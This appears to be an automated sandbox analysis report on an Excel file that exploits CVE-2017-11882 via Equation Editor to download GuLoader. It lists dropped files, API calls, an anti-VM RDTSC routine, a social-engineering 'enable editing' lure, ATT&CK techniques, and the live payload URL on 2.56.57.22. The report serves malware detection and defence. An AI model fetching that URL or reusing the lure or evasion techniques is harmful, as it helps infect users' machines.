Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, lang-1045.dll.4.dr	String found in binary or memory: http://www.avast.com0/
Source: EQNEDT32.EXE, 00000002.00000002.975232568.000000000056C000.00000004.00000020.00020000.00000000.sdmp, droidttrre[1].exe.2.dr, venxajlddf.exe.2.dr	String found in binary or memory: http://www.certum.pl/CPS0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://www.nero.com
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.4.dr	String found in binary or memory: https://github.com/dotnet/runtime
Source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr, lang-1045.dll.4.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\869A5E80.emf

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036D05C4 URLDownloadToFileW,

2_2_036D05C4

Source: global traffic

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_00405809 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

4_2_00405809

System Summary

Malicious sample detected (through community Yara rule)

Source: sheet1.xml, type: SAMPLE

Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: enable Editing a Extract: ARMOURY CRATE CGPU Product.exe 15 r~m0mmbq 'bove to v Extract: APPEASINGL
Source: Screenshot number: 8	Screenshot OCR: enable Editing and Content from the Yellow bar 15 r~m0mmbq . 'bove to view locked content. " ' J"'
Source: Document image extraction number: 1	Screenshot OCR: enable Editing and Content from the Yellow bar above to view locked content. '0 p Search eloper
Source: Document image extraction number: 2	Screenshot OCR: enable Editing and Content from the Yellow bar above to view locked content. ' p SCMb eloper H

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\venxajlddf.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe			Jump to dropped file

Source: sheet1.xml, type: SAMPLE

Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

4_2_00403640

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_00406D5F		4_2_00406D5F
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_73BF1BFF		4_2_73BF1BFF

Source: BD3.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Process Stats: CPU usage > 98%

Source: MsMpLics.dll.4.dr	Static PE information: No import functions for PE file found
Source: lang-1045.dll.4.dr	Static PE information: No import functions for PE file found
Source: System.IO.FileSystem.Watcher.dll.4.dr	Static PE information: No import functions for PE file found

Source: droidttrre[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: venxajlddf.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: p11-kit-trust.dll.4.dr

Static PE information: Number of sections : 11 > 10

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77740000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Memory allocated: 77620000 page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Memory allocated: 77740000 page execute and read and write	Jump to behavior

Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	Virustotal: Detection: 54%
Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	Metadefender: Detection: 22%
Source: #confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	ReversingLabs: Detection: 58%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\venxajlddf.exe C:\Users\user\AppData\Roaming\venxajlddf.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\venxajlddf.exe C:\Users\user\AppData\Roaming\venxajlddf.exe	Jump to behavior

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

4_2_00403640

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR77BE.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@4/21@0/1

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_004021AA CoCreateInstance,

4_2_004021AA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

4_2_00404AB5

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

File written: C:\Users\user\AppData\Local\Temp\krista.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: H:\n2\3rdparty\FFmpeg\2.8.2\public\src\ffmpeg\libavutil\avutil-54.pdb source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr
Source:	Binary string: System.IO.FileSystem.Watcher.ni.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.4.dr
Source:	Binary string: D:\SourceCode\gc3.gpuswitch\production_V4.2\Service\ServiceSDK\Release\GPUSwitchPlugin\ARMOURY CRATE eGPU Product.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr
Source:	Binary string: D:\SourceCode\gc3.gpuswitch\production_V4.2\Service\ServiceSDK\Release\GPUSwitchPlugin\ARMOURY CRATE eGPU Product.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, ARMOURY CRATE eGPU Product.exe.4.dr
Source:	Binary string: H:\n2\3rdparty\FFmpeg\2.8.2\public\src\ffmpeg\libavutil\avutil-54.pdb source: venxajlddf.exe, 00000004.00000002.1181027714.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, avutil-54.dll.4.dr
Source:	Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.Watcher\net6.0-windows-Release\System.IO.FileSystem.Watcher.pdb source: venxajlddf.exe, 00000004.00000002.1180707853.0000000002870000.00000004.00000800.00020000.00000000.sdmp, System.IO.FileSystem.Watcher.dll.4.dr

Source: BD3.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.1181440399.0000000003F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_73BF30C0 push eax; ret

4_2_73BF30EE

Source: p11-kit-trust.dll.4.dr

Static PE information: section name: .xdata

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_73BF1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_73BF1BFF

Source: MsMpLics.dll.4.dr

Static PE information: 0xE6DA2BE7 [Wed Sep 24 01:22:47 2092 UTC]

Source: initial sample

Static PE information: section name: .text entropy: 6.94282730477

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\lang-1045.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\MsMpLics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\p11-kit-trust.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	File created: C:\Users\user\AppData\Local\Temp\avutil-54.dll	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\venxajlddf.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe	Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

RDTSC instruction interceptor: First address: 0000000003F3284D second address: 0000000003F3284D instructions: 0x00000000 rdtsc 0x00000002 test ch, dh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4F04CEE131h 0x00000008 test bl, dl 0x0000000a test dh, dh 0x0000000c inc ebp 0x0000000d pushad 0x0000000e mov di, 3FC4h 0x00000012 cmp di, 3FC4h 0x00000017 jne 00007F4F04CFCB1Eh 0x0000001d popad 0x0000001e inc ebx 0x0000001f cmp ah, ch 0x00000021 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2096

Thread sleep time: -300000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lang-1045.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MsMpLics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\p11-kit-trust.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\avutil-54.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	4_2_00405D74
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_0040699E FindFirstFileW,FindClose,	4_2_0040699E
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	Code function: 4_2_0040290B FindFirstFileW,	4_2_0040290B

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	API call chain: ExitProcess graph end node	graph_2-2771
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	API call chain: ExitProcess graph end node	graph_4-4505
Source: C:\Users\user\AppData\Roaming\venxajlddf.exe	API call chain: ExitProcess graph end node	graph_4-4286

Source: avutil-54.dll.4.dr	Binary or memory string: yuv420pyuyv422rgb24bgr24yuv422pyuv444pyuv410pyuv411pgraygray8,y8monowmonobpal8yuvj420pyuvj422pyuvj444pxvmcmcxvmcidctuyvy422uyyvyy411bgr8bgr4bgr4_bytergb8rgb4rgb4_bytenv12nv21argbrgbaabgrbgragray16bey16begray16ley16leyuv440pyuvj440pyuva420pvdpau_h264vdpau_mpeg1vdpau_mpeg2vdpau_wmv3vdpau_vc1rgb48bergb48lergb565bergb565lergb555bergb555lebgr565bebgr565lebgr555bebgr555levaapi_mocovaapi_idctvaapi_vldyuv420p16leyuv420p16beyuv422p16leyuv422p16beyuv444p16leyuv444p16bevdpau_mpeg4dxva2_vldrgb444lergb444bebgr444lebgr444beya8gray8abgr48bebgr48leyuv420p9beyuv420p9leyuv420p10beyuv420p10leyuv422p10beyuv422p10leyuv444p9beyuv444p9leyuv444p10beyuv444p10leyuv422p9beyuv422p9levda_vldgbrpgbrp9begbrp9legbrp10begbrp10legbrp16begbrp16leyuva420p9beyuva420p9leyuva422p9beyuva422p9leyuva444p9beyuva444p9leyuva420p10beyuva420p10leyuva422p10beyuva422p10leyuva444p10beyuva444p10leyuva420p16beyuva420p16leyuva422p16beyuva422p16leyuva444p16beyuva444p16levdpauxyz12lexyz12benv16nv20lenv20beyvyu422vdaya16beya16leqsvmmald3d11va_vldrgba64bergba64lebgra64bebgra64le0rgbrgb00bgrbgr0yuva444pyuva422pyuv420p12beyuv420p12leyuv420p14beyuv420p14leyuv422p12beyuv422p12leyuv422p14beyuv422p14leyuv444p12beyuv444p12leyuv444p14beyuv444p14legbrp12begbrp12legbrp14begbrp14legbrapgbrap16begbrap16leyuvj411pbayer_bggr8bayer_rggb8bayer_gbrg8bayer_grbg8bayer_bggr16lebayer_bggr16bebayer_rggb16lebayer_rggb16bebayer_gbrg16lebayer_gbrg16bebayer_grbg16lebayer_grbg16beyuv440p10leyuv440p10beyuv440p12leyuv440p12beayuv64leayuv64bevideotoolbox_vldunknowntvpcreservedbt470mbt2020linearlog100log316iec61966-2-4bt1361eiec61966-2-1bt2020-10bt2020-20gbrycgcobt2020ncbt2020cunspecifiedleftcentertoplefttopbottomleftbottomrgb32bgr32le%s%sname nb_components nb_bits%-11s %7d %10dlibavutil/pixdesc.cd->log2_chroma_w <= 3d->log2_chroma_h <= 3d->nb_components <= 4d->name && d->name[0](d->nb_components==4 \|\| d->nb_components==2) == !!(d->flags & (1 << 7))!c->plane && !c->step_minus1 && !c->offset_plus1 && !c->shift && !c->depth_minus1c->step_minus1 >= c->depth_minus18*(c->step_minus1+1) >= c->depth_minus1+1bayer_tmp[0] == 0 && tmp[1] == 0beyuvjpixelutils support is required but libavutil is not compiled with it
Source: venxajlddf.exe, 00000004.00000002.1180587044.00000000005D4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: avutil-54.dll.4.dr	Binary or memory string: xvmcidct

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

Code function: 4_2_73BF1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

4_2_73BF1BFF

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_036D0636 mov edx, dword ptr fs:[00000030h]

2_2_036D0636

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\venxajlddf.exe C:\Users\user\AppData\Roaming\venxajlddf.exe

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Roaming\venxajlddf.exe

4_2_00403640

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	Path Interception	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	21 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	13 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	22 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	1 Access Token Manipulation	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	121 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	15 System Information Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Scripting	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	2 Obfuscated Files or Information	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Software Packing	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	1 Timestomp	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	55%	Virustotal		Browse
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	23%	Metadefender		Browse
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	59%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	100%	Avira	EXP/CVE-2017-11882.Gen
#confirmaci#U00f3n+y+correcci#U00f3n+de+la+direccion.xls	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe	32%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\droidttrre[1].exe	38%	ReversingLabs	Win32.Downloader.GuLoader
C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\ARMOURY CRATE eGPU Product.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MsMpLics.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\MsMpLics.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\System.IO.FileSystem.Watcher.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\avutil-54.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\avutil-54.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\lang-1045.dll	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\lang-1045.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\nsoF8F7.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\p11-kit-trust.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\venxajlddf.exe	32%	Metadefender		Browse
C:\Users\user\AppData\Roaming\venxajlddf.exe	38%	ReversingLabs	Win32.Downloader.GuLoader

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.EQNEDT32.EXE.5a9b33.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://subca.ocsp-certum.com05	0%	URL Reputation	safe
http://2.56.57.22/droidttrre.exej	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://subca.ocsp-certum.com02	0%	URL Reputation	safe
http://subca.ocsp-certum.com01	0%	URL Reputation	safe
http://2.56.57.22/droidttrre.exeooC:	0%	Avira URL Cloud	safe
http://2.56.57.22/droidttrre.exe	12%	Virustotal		Browse
http://2.56.57.22/droidttrre.exe	100%	Avira URL Cloud	malware
http://www.avast.com0/	0%	URL Reputation	safe
